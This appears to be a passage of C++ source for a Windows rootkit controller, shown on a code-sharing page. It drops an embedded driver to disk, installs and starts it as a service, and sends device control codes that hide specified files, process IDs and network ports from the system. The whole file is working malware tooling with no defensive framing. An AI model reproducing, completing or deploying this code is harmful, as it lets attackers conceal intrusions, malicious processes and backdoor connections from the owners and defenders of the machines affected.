📄 rootkitmodule.cpp
字号:
{
if(GetLastError() == ERROR_SERVICE_ALREADY_RUNNING)
{
return nRet;
}
}
CloseServiceHandle(schService);
return nRet;
}
BOOL CRootKitModule::StopService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
SC_HANDLE schService = NULL;
SERVICE_STATUS ServiceStatus;
int nRet = 0;
schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
if(schService == NULL)
return FALSE;
nRet = ControlService(schService, SERVICE_CONTROL_STOP, &ServiceStatus);
if(!nRet)
{
switch(GetLastError())
{
case ERROR_SERVICE_NOT_ACTIVE:
return nRet;
case ERROR_INVALID_SERVICE_CONTROL:
return nRet;
}
}
CloseServiceHandle(schService);
return nRet;
}
BOOL CRootKitModule::RemoveService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
SC_HANDLE schService;
int nRet = 0;
schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
if(schService == NULL)
return FALSE;
nRet = DeleteService(schService);
CloseServiceHandle(schService);
return nRet;
}
HANDLE CRootKitModule::_CreateFile()
{
return CreateFile(MY_DEVICE_NAME,GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
}
bool CRootKitModule::DeleteDriver(LPCTSTR szDriver )
{
if( !szDriver)
{
StopService(m_hSCManager, szDriver);
return !!RemoveService(m_hSCManager, szDriver);
}
StopService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
return !!RemoveService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
bool CRootKitModule::CreateDriver(LPCSTR szFileName, LPCSTR szDriver)
{
HANDLE hFile=CreateFile(szFileName,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
DWORD dwBytes;
WriteFile(hFile,g_szRootKitModule,sizeof(g_szRootKitModule) - 1,&dwBytes,NULL);
CloseHandle(hFile);
m_strDriverName = ATL::CT2W(szDriver);
StopDriver();
RemoveService(m_hSCManager, szDriver);
if ( !InstallService(m_hSCManager, szDriver, szFileName) )
return false;
return true;
}
bool CRootKitModule::StartDriver()
{
return !!StartService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
bool CRootKitModule::StopDriver()
{
return !!StopService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
bool CRootKitModule::AddHideFile(LPCTSTR szFile)
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256];
strcpy(szInBuff, ATL::CT2A(szFile));
_strupr(szInBuff);
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEFILE,szInBuff,(DWORD)strlen(szFile), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}
bool CRootKitModule::DelHideFile(LPCTSTR szFile)
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256];
strcpy(szInBuff, ATL::CT2A(szFile));
_strupr(szInBuff);
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEFILE,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}
bool CRootKitModule::StartHideFile()
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256] = "";
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEFILE,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}
bool CRootKitModule::AddHideProcessId(DWORD dwId)
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256] = "";
memcpy(szInBuff, &dwId, sizeof(DWORD));
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}
bool CRootKitModule::DelHideProcessId(DWORD dwId)
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256] = "";
memcpy(szInBuff, &dwId, sizeof(DWORD));
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}
bool CRootKitModule::StartHideProcess()
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256] = "";
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}
bool CRootKitModule::AddHidePort(DWORD dwPort)
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256] = "";
memcpy(szInBuff, &dwPort, sizeof(DWORD));
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}
bool CRootKitModule::DelHidePort(DWORD dwPort)
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256] = "";
memcpy(szInBuff, &dwPort, sizeof(DWORD));
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}
bool CRootKitModule::StartHidePort()
{
HANDLE hDevice = _CreateFile();
if (hDevice==INVALID_HANDLE_VALUE)
return false;
char szInBuff[256] = "";
DWORD dwBytesReturned;
if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
{
CloseHandle(hDevice);
return FALSE;
}
CloseHandle(hDevice);
return true;
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -